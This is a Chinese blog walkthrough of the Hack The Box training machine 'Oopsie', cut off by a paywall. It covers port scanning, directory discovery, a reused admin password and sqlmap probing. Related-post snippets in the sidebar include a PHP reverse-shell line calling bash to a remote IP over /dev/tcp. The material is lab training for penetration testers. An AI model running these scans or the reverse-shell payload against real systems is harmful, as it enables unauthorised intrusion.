HTB靶机之Oopsie

最新推荐文章于 2025-03-23 12:22:40 发布
最新推荐文章于 2025-03-23 12:22:40 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: HTB 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_46412682/article/details/108345534
版权
本文详细记录了对HTB靶机Oopsie的渗透过程,包括通过masscan和nmap进行端口扫描,发现80端口的登录提示,利用dirbuster和Burp Suite扫描目录与爆破账号密码,发掘SQL注入和上传点,最终通过修改ACCESS ID获取Webshell,以及权限提升至root的步骤。涉及到的技术包括sqlmap、Burp Suite、目录扫描、Webshell上传和权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

HTB靶机之Oopsie

1、VPN connection

在这里插入图片描述

2、信息收集

①masscan端口扫描

sudo masscan -p1-65535,U:1-65535 --rate 1000 -e tun0 10.10.10.28

在这里插入图片描述

②nmap扫描端口对应的服务

nmap -sC -sV 10.10.10.28

在这里插入图片描述

开放了22端口和80端口

操作系统是:linux

3、访问80端口

在这里插入图片描述

没有什么可以点或者打开的地方,拉到最下面,有一条提示信息Please login to get access to the service.,说明有可以登录的地方
在这里插入图片描述

4、dirbuster扫描目录

在这里插入图片描述

或者用burpsuit抓包,抓包后forward,在Target中可以看到登录的路径

在这里插入图片描述

5、爆破账号密码

在这里插入图片描述

看到登录页面自然想到的是暴力破解,但是starting point靶机之间是有关联的,这个靶机是上一个靶机ARCHETYPE使用过的密码,这里是

username:admin

password:MEGACORP_4dm1n!!
在这里插入图片描述

6、漏洞挖掘

①sqlmap扫描

在这里插入图片描述

点击account页面,发现url疑似存在sql注入,用sqlmap扫描,level 3也没有找到sql注入

sqlmap -u "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1" --level 3

在这里插入图片描述

抓包保存为1.txt,继续用sqlmap 扫描

sqlmap -r 1.txt

在这里插入图片描述

也没有注入点

但是修改url上的id值时,页面也会发生变化

②找上传点

点击uploads页面,有提示需要super admin才可以操作<

最低0.47元/天 解锁文章
[渗透测试]HTB靶机-Oopsie
Y4tacker的博客
07-22 680
文章目录Oopsie Oopsie 首先跳过nmap扫描的过程,现在我们直接开始日,发现了 http://10.10.10.28/cdn-cgi/login/admin.php 用admin和MEGACORP_4dm1n!! 这里存在一个水平越权的漏洞,具体不给出分析了,看cookie都懂 垂直越权后发现存在文件上传点 这里来反弹一个shell <?php exec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.166/4444 0&lt
[渗透测试]HTB-Oopsie
weixin_47224111的博客
11-15 1396
0x01 信息收集 nmap扫描 发现80端口 和22端口
2025年最新masscan安装和常用指令使用教程
最新发布
2303_78851087的博客
03-23 312
2025年最新masscan安装和常用指令使用教程
HTB-Oopsie(越权漏洞,suid提权,js接口查询插件)
weixin_58038441的博客
09-11 1608
今天我们介绍了越权漏洞 和 suid提权,findSometing js接口插件。
hack the box靶场oopsie靶机
zr1213159840的博客
03-21 1723
打开靶机,看一下第一个问题: 问:什么可以拦截本地的流量? 答案:看着y结尾,应该是proxy,输入正确 第二问: 问:登录界面在什么文件夹下面? 答案:/cdn-cgi/login。知道这个页面的最直接的方式是f12后看下页面,能看到有一个cdn-cgi/login相关的信息。同时,根据提示,可以使用burpsuite爬取,这也是更加合适的方式,因为爬取能提供我们下一步信息。 在burpsuite中爬取这个网站,操作就是拦截数据包后在target中右击网站选择spider this host即可。然
# HTB-Tier2- Oopsie
32bin的博客
11-16 926
TagsPHPWebApacheOPENCONNECTONLINETask 1****yproxyTask 2//****nTask 3*****ecookieTask 4****234322Task 5/******s/uploadsTask 6**.**pdb.phpTask 7***dfindTask 8***trootTask 9Task 10cat尝试user=2233;
Hack The Box - STARTING POINT
小小郭的博客
03-06 2610
Hack The Box - STARTING POINT
HTB_Start Point_Tier2——Oopsie
m0_46607055的博客
08-22 1593
HTB_Start Point_Tier2——Oopsie 反弹shell+suid提权
HTB Hack The Box -- Oopsie
Gh0st_1n_The_Shell的博客
09-10 245
开放了22ssh,80端口,其中ssh有弱口令爆破端口 先打开网页,然后进行目录爆破,在这期间先看一下网页的大概信息 没爆到什么有用的东西,但是有uploads文件夹说明是不是说明有文件上传?
HTB靶场系列 linux靶机 靶机cronos
m0_57221101的博客
01-19 1864
勘探 基本操作先用nmap扫一下 nmap 10.10.10.13 Starting Nmap 7.80 (https://nmap.org) at 2020-04-07 21:01 EDT Nmap scan report for 10.10.10.13 Host is up (0.014s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain ..
HTB-Permx靶机笔记
LINGX5的博客
08-11 1202
我们用nmap扫描,探测出了目标服务有http和ssh服务,对http服务进行子域名枚举,在它的旁站中,我们发现他是一个cms的架构在github上找到了chamilo框架的CVE-2023-4220漏洞,根据github上的教程利用exp,成功后的了www-data用户权限。在chamilo框架的配置文件中,我们发现mysql数据库的配置信息,可以成功登陆数据库,但是admin的密码是hash值很难破解。
HackTheBox - Oopsie
qq_45862635的博客
06-12 1037
Hack The Box :: Starting Point - Tier2 - Oopsie
HTB系列】靶机Chaos的渗透测试详解
大方子
06-08 1569
HTB系列】靶机Chaos的渗透测试详解 是大方子/2019.6.8/ 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress 修改hosts来对网页邮件系统webmail进行访问 LaTax反弹shell 通过tar来进行限制shell的绕过并修复shell的PATH 用firefox_decrypt提取火狐的用户凭证缓存 介...
HTB_Oopsie之SUID提权
网络安全学习
08-29 1135
有些地方把握不准 基础不牢
oscp——HTB——Beep
王嘟嘟的博客
05-09 521
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Rootshell 先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入 搜索一下Elastix的历史漏洞 首先看到了一个LFI的洞,下载下来,然后看一下 利用payload进行测试 这里找到了一个admin的密码 jEhdIekWmdjE 可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。 ...
masscan的常用命令记录
记录学习,一起进步
02-09 3066
masscan的常用命令
masscan详解
热门推荐
nex1less的博客
08-24 3万+
一、masscan简单用法 0x00 常用参数 示例: masscan --ports 1-10000 192.168.26.131 --adapter-ip 192.168.26.1 --adapter-ip 指定发包的ip地址 --adapter-port 指定发包源端口 --adapter-mac 指定发包的源MAC地址 --router-mac 指定网关MAC地址 --exclude IP地址范围黑名单,防止masscan扫描 --excludefile 指定IP地..
Masscan:最快的互联网IP端口扫描器
qq_40907977的博客
05-15 3700
介绍 Masscan号称是最快的互联网端口扫描器,最快可以在六分钟内扫遍互联网。 masscan的扫描结果类似于nmap(一个很著名的端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。 安装配置 在Debian/Ubuntu系统中,安装方法如下: $ sudo apt-get install git gcc make libpca
masscan使用
未完成的歌~的博客
02-20 1261
masscan 是一种快速的端口扫描工具,旨在快速扫描大量IP地址和端口。masscan的发包速度非常快,在windows中,它的发包速度可以达到每秒30万包;在Linux中,速度可以达到每秒160万。masscan在扫描时会随机选择目标IP,所以不会对远程的主机造成压力。默认情况下,masscan的发包速度为每秒100包,为了提高速度,可以设置为。下载链接。
ROS PCQ HTB压缩包内容解析
但是,根据常规解释,“HTB”可能代表以下含义之一: - **Hierarchical Token Bucket**:这是一种数据包调度算法,用于在数据网络中分配带宽资源。 - **Hard-Throughput Bound**:在性能分析中,这可能指的是系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值